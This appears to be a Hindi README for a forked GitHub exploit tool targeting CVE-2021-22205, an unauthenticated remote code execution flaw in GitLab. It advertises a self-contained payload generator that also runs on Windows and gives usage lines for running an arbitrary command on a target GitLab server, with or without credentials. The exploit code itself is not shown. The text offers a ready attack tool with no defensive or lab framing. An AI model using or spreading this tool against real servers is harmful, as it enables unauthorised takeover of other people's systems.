
CVE-2021-22205 Gitlab अनधिकृत रिमोट कोड निष्पादन भेद्यता EXP, djvumake & djvulibre पर निर्भरता हटा दी गई, Windows प्लेटफ़ॉर्म पर उपयोग किया जा सकता है
mr-r3bot/Gitlab-CVE-2021-22205 पर आधारित फोर्क
CVE-2021-22205: Gitlab अनधिकृत रिमोट कोड निष्पादन भेद्यता EXP
djvumake और djvulibre पर निर्भरता हटा दी गई है, पेलोड सीधे आंतरिक रूप से उत्पन्न किया जाता है, और इसे Windows प्लेटफ़ॉर्म पर निष्पादित किया जा सकता है।
# प्राधिकरण आवश्यक
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# बिना प्राधिकरण
python3 exploit.py -t <gitlab_url> -c <command>